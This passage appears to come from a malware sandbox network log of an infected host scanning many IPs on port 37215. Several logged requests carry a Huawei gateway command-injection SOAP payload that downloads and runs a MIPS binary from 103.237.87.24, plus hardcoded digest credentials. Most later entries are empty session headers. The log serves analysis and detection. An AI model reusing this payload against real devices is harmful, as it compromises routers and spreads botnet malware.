2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2507192.168.2.134755241.144.121.24237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.636710882 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2508192.168.2.134367841.247.122.24537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.636713982 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2509192.168.2.136058441.186.36.11837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.636722088 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2510192.168.2.1346126197.123.126.11237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.636775970 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2511192.168.2.1355574197.231.65.9137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.636779070 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2512192.168.2.133441241.167.13.9337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.636792898 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2513192.168.2.1357310157.38.179.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2514192.168.2.1348664157.250.56.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2515192.168.2.134729841.47.231.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2516192.168.2.1339652157.177.169.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2517192.168.2.1350864157.16.196.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2518192.168.2.1350564157.83.254.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2519192.168.2.1356088197.245.244.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2520192.168.2.136024841.30.57.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2521192.168.2.1338572197.203.109.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2522192.168.2.135109241.255.11.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2523192.168.2.1354562157.70.72.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2524192.168.2.134424041.69.250.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2525192.168.2.1339380189.174.35.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2526192.168.2.1355634207.81.215.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2527192.168.2.133349441.8.95.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2528192.168.2.1335038157.152.4.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2529192.168.2.1339844197.117.194.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2530192.168.2.1336756157.19.254.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2531192.168.2.1357898212.200.46.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2532192.168.2.135882498.224.122.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2533192.168.2.1355380197.63.84.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2534192.168.2.1351864141.151.39.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2535192.168.2.1345066197.171.33.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2536192.168.2.1360916212.231.101.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2537192.168.2.1346258197.48.74.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2538192.168.2.1346692157.214.241.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2539192.168.2.1343900157.186.108.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2540192.168.2.134894441.27.14.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2541192.168.2.13375928.168.102.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2542192.168.2.135115841.253.91.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2543192.168.2.1355164197.9.89.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2544192.168.2.1347000197.227.84.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2545192.168.2.135154041.111.136.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2546192.168.2.1355670197.50.176.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2547192.168.2.1342954157.100.237.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2548192.168.2.133418041.244.217.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2549192.168.2.1345572135.5.2.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2550192.168.2.1339628157.249.171.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2551192.168.2.135585041.150.136.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2552192.168.2.1341236157.177.124.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2553192.168.2.134393841.114.113.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2554192.168.2.133671441.28.13.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2555192.168.2.1347790204.124.11.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2556192.168.2.1344552197.199.217.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2557192.168.2.1344232197.109.36.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2558192.168.2.1357070157.40.228.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2559192.168.2.135683641.169.69.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2560192.168.2.135314846.159.165.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2561192.168.2.133624241.239.6.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2562192.168.2.1341996157.47.255.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2563192.168.2.133535041.205.190.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2564192.168.2.1346716160.115.255.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2565192.168.2.135539041.76.9.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2566192.168.2.134452041.251.27.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2567192.168.2.1353050153.108.88.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2568192.168.2.1333126197.148.5.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2569192.168.2.1359966157.135.46.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2570192.168.2.1346896197.165.190.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2571192.168.2.1340056197.237.112.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2572192.168.2.135650041.29.1.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2573192.168.2.135175446.209.3.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2574192.168.2.1347596157.120.47.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2575192.168.2.1354600197.43.138.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2576192.168.2.1333428157.124.196.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2577192.168.2.1335810197.157.246.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2578192.168.2.1348314157.97.185.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2579192.168.2.1333774197.155.58.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2580192.168.2.1354056197.53.16.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2581192.168.2.134793641.209.105.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2582192.168.2.1351686197.56.198.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2583192.168.2.1346874197.60.182.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2584192.168.2.1360816157.56.190.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2585192.168.2.136038099.228.45.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2586192.168.2.135604241.133.183.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2587192.168.2.1348414197.177.32.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2588192.168.2.1336172197.241.174.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2589192.168.2.1349842159.72.78.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2590192.168.2.1334772197.221.151.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2591192.168.2.1353762183.89.23.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2592192.168.2.1341684197.26.95.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2593192.168.2.1357560197.57.64.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2594192.168.2.1349110157.185.99.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2595192.168.2.134488237.176.240.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2596192.168.2.1346196157.128.64.14537215
